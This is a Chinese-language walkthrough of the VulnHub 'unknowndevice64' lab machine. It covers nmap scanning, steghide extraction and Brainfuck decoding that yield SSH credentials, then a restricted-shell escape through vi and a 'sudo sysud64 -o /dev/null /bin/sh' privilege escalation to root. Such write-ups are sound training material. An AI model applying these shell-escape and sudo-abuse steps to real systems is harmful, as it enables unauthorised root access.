device靶机详解

靶机下载地址

复制代码
https://www.vulnhub.com/entry/unknowndevice64-1,293/

靶机配置

主机发现

复制代码
arp-scan -l

端口扫描

复制代码
nmap -sV -A -T4 192.168.229.159
复制代码
nmap -sS -Pn -A -p- -n 192.168.229.159

这段代码使用nmap工具对目标主机进行了端口扫描和服务探测。

-sS:使用SYN扫描方式进行端口扫描,它比默认的TCP扫描方式更快,因为它只发送SYN包而不发送其他数据包。

-Pn:禁用主机发现,即不发送ICMP Echo Request数据包来判断目标主机是否存活。

-A:启用操作系统探测、版本探测、脚本扫描和跟踪路由。

-p-:扫描所有65535个端口。

-n:不进行DNS解析,直接使用IP地址进行扫描。

192.168.229.159:目标主机的IP地址。

这段代码的目的是扫描目标主机开放的所有端口,并获取其操作系统类型、版本、服务等信息。

网页访问

复制代码
http://192.168.229.159:31337/#

F12查看页面源码

发现隐藏目录key_is_h1dd3n.jpg

拼接访问

是个图片,猜测是个ctf隐写

复制代码
http://192.168.229.159:31337/key_is_h1dd3n.jpg

下载图像,使用kali工具**steghid(开源隐写程序)**进行隐写!!!

复制代码
steghide extract -sf key_is_h1dd3n.jpg

需要密码,猜测为h1ddsn,猜测成功

自动生成一个图片,复制到本机,使用在线工具https://copy.sh/brainfuck/,或者https://www.splitbrain.org/services/ook在线解密后即可获取到ssh的用户名和密码;

复制代码
https://copy.sh/brainfuck/

账户:ud64

密码:1M!#64@ud

目录扫描

复制代码
dirb "http://192.168.229.159:31337"

GETshell

ssh连接

复制代码
ssh ud64@192.168.229.159 -p 1337

提权

连按两下TAB键,查看当前用户权限,及可以使用的命令:

发现vi和 export命令可以使用

export命令用于设置或显示环境变量,在shell中执行程序时,shell会提供一组环境变量,export可新增,修改或删除环境变量

1、在vi编辑器中,输入 :!/bin/bash

在vi命令行下输入!/bin/bash即可顺利进入bash

2、通过export命令修改环境变量,将/bin/bash导出到shell环境变量,将/usr/bin目录导出到PATH环境变量:

复制代码
在vi命令行下输入!/bin/bash即可顺利进入bash
通过export命令修改环境变量,将/bin/bash导出到shell环境变量,将/usr/bin目录导出到PATH环境变量:
export SHELL=/bin/bash:$SHELL
export PATH=/usr/bin:$PATH
export PATH=/bin:$PATH

使用sudo sysud64 -h查看帮助消息,发现可以使用

复制代码
-o file        send trace output to FILE instead of stderr

尝试将root用户的shell导出到该用户下

复制代码
sudo sysud64 -o /dev/null /bin/sh
复制代码
id
whoami

提权成功

相关推荐
Le_ee9 小时前
Apache2
服务器·网络安全·apache·web
小张的博客之旅12 小时前
2025年“羊城杯”网络安全大赛 线上初赛 (WriteUp)
python·学习·网络安全
unable code12 小时前
攻防世界-Web-shrine
网络安全·web·ctf
缘友一世18 小时前
活动目录的枚举学习
学习·网络安全·网路攻击
Tajang1 天前
推荐一个浏览器代理插件(Tajang Proxy),支持Chrome和Edge
前端·chrome·网络安全·渗透测试·靶场·edge
lubiii_1 天前
SQLMap常用命令指南(参数及其用法)
sql·web安全·网络安全
北'辰2 天前
VMware安装Kali-Linux
linux·网络安全
盛满暮色 风止何安2 天前
防火墙的类别和登录Web的方法
linux·运维·服务器·网络·网络协议·tcp/ip·网络安全
风语者日志2 天前
CTF攻防世界WEB精选基础入门:command_execution
web安全·网络安全·ctf·小白入门
white-persist2 天前
XXE 注入漏洞全解析:从原理到实战
开发语言·前端·网络·安全·web安全·网络安全·信息可视化